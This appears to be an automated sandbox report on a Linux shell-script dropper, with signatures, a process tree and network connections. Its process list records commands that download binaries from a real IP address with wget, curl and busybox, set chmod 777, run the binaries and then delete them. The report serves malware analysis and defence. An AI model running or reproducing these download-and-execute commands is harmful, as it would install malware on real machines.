Malware Analysis Report

2025-04-03 19:10

Sample ID 241121-j96xzazpgv
Target c4daf483f2384fdf2bff7a1e016535e9a3cec0cbb1d46a6f00462421576db620.sh
SHA256 c4daf483f2384fdf2bff7a1e016535e9a3cec0cbb1d46a6f00462421576db620
Tags
antivm defense_evasion discovery
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

c4daf483f2384fdf2bff7a1e016535e9a3cec0cbb1d46a6f00462421576db620

Threat Level: Shows suspicious behavior

The file c4daf483f2384fdf2bff7a1e016535e9a3cec0cbb1d46a6f00462421576db620.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm defense_evasion discovery

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-21 08:23

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-21 08:23

Reported

2024-11-21 08:25

Platform

debian9-armhf-20240729-en

Max time kernel

17s

Max time network

19s

Command Line

[/tmp/c4daf483f2384fdf2bff7a1e016535e9a3cec0cbb1d46a6f00462421576db620.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 N/A
N/A /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC N/A
N/A /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC N/A
N/A /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 N/A
N/A /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW N/A
N/A /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ N/A
N/A /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 N/A
N/A /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 N/A
N/A /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci N/A
N/A /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 N/A
N/A /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX N/A
N/A /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ N/A
N/A /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil N/A
N/A /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff N/A
N/A /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 N/A
N/A /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 N/A
N/A /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci N/A
N/A /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 N/A
N/A /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX N/A
N/A /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ N/A
N/A /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC /usr/bin/curl N/A
File opened for modification /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 /usr/bin/curl N/A
File opened for modification /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff /usr/bin/curl N/A
File opened for modification /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci /usr/bin/curl N/A
File opened for modification /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 /usr/bin/curl N/A
File opened for modification /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil /usr/bin/curl N/A
File opened for modification /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 /usr/bin/curl N/A
File opened for modification /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 /usr/bin/curl N/A
File opened for modification /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci /usr/bin/curl N/A
File opened for modification /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 /usr/bin/curl N/A
File opened for modification /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX /usr/bin/curl N/A
File opened for modification /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil /usr/bin/curl N/A
File opened for modification /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 /usr/bin/curl N/A
File opened for modification /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX /usr/bin/curl N/A
File opened for modification /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW /usr/bin/curl N/A
File opened for modification /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ /usr/bin/curl N/A
File opened for modification /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 /usr/bin/curl N/A
File opened for modification /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 /usr/bin/curl N/A
File opened for modification /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ /usr/bin/curl N/A
File opened for modification /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ /usr/bin/curl N/A
File opened for modification /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC /usr/bin/curl N/A

Processes

/tmp/c4daf483f2384fdf2bff7a1e016535e9a3cec0cbb1d46a6f00462421576db620.sh

[/tmp/c4daf483f2384fdf2bff7a1e016535e9a3cec0cbb1d46a6f00462421576db620.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.125.191/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/bin/chmod

[chmod 777 OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4

[./OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/bin/rm

[rm OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/usr/bin/wget

[wget http://87.120.125.191/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/bin/chmod

[chmod 777 LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC

[./LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/bin/rm

[rm LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/usr/bin/wget

[wget http://87.120.125.191/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/bin/chmod

[chmod 777 pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC

[./pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/bin/rm

[rm pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/usr/bin/wget

[wget http://87.120.125.191/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/bin/chmod

[chmod 777 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3

[./6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/bin/rm

[rm 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/usr/bin/wget

[wget http://87.120.125.191/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/bin/chmod

[chmod 777 UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW

[./UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/bin/rm

[rm UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/usr/bin/wget

[wget http://87.120.125.191/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ]

/bin/chmod

[chmod 777 k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ]

/tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ

[./k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ]

/bin/rm

[rm k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ]

/usr/bin/wget

[wget http://87.120.125.191/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/bin/chmod

[chmod 777 Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5

[./Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/bin/rm

[rm Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/usr/bin/wget

[wget http://87.120.125.191/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/bin/chmod

[chmod 777 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1

[./0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/bin/rm

[rm 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/usr/bin/wget

[wget http://87.120.125.191/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/bin/chmod

[chmod 777 Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci

[./Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/bin/rm

[rm Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/usr/bin/wget

[wget http://87.120.125.191/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/bin/chmod

[chmod 777 V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463

[./V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/bin/rm

[rm V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/usr/bin/wget

[wget http://87.120.125.191/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/bin/chmod

[chmod 777 zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX

[./zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/bin/rm

[rm zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/usr/bin/wget

[wget http://87.120.125.191/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/bin/chmod

[chmod 777 BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ

[./BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/bin/rm

[rm BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/usr/bin/wget

[wget http://87.120.125.191/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/bin/chmod

[chmod 777 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil

[./2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/bin/rm

[rm 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/usr/bin/wget

[wget http://87.120.125.191/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff]

/bin/chmod

[chmod 777 PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff]

/tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff

[./PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff]

/bin/rm

[rm PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff]

/usr/bin/wget

[wget http://87.120.125.191/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/bin/chmod

[chmod 777 Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5

[./Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/bin/rm

[rm Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/usr/bin/wget

[wget http://87.120.125.191/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/bin/chmod

[chmod 777 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1

[./0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/bin/rm

[rm 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/usr/bin/wget

[wget http://87.120.125.191/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/bin/chmod

[chmod 777 Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci

[./Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/bin/rm

[rm Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/usr/bin/wget

[wget http://87.120.125.191/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/bin/chmod

[chmod 777 V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463

[./V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/bin/rm

[rm V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/usr/bin/wget

[wget http://87.120.125.191/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/bin/chmod

[chmod 777 zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX

[./zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/bin/rm

[rm zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/usr/bin/wget

[wget http://87.120.125.191/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/bin/chmod

[chmod 777 BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ

[./BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/bin/rm

[rm BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/usr/bin/wget

[wget http://87.120.125.191/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/bin/chmod

[chmod 777 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil

[./2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/bin/rm

[rm 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil]

/usr/bin/wget

[wget http://87.120.125.191/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff]

Network

Country Destination Domain Proto
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
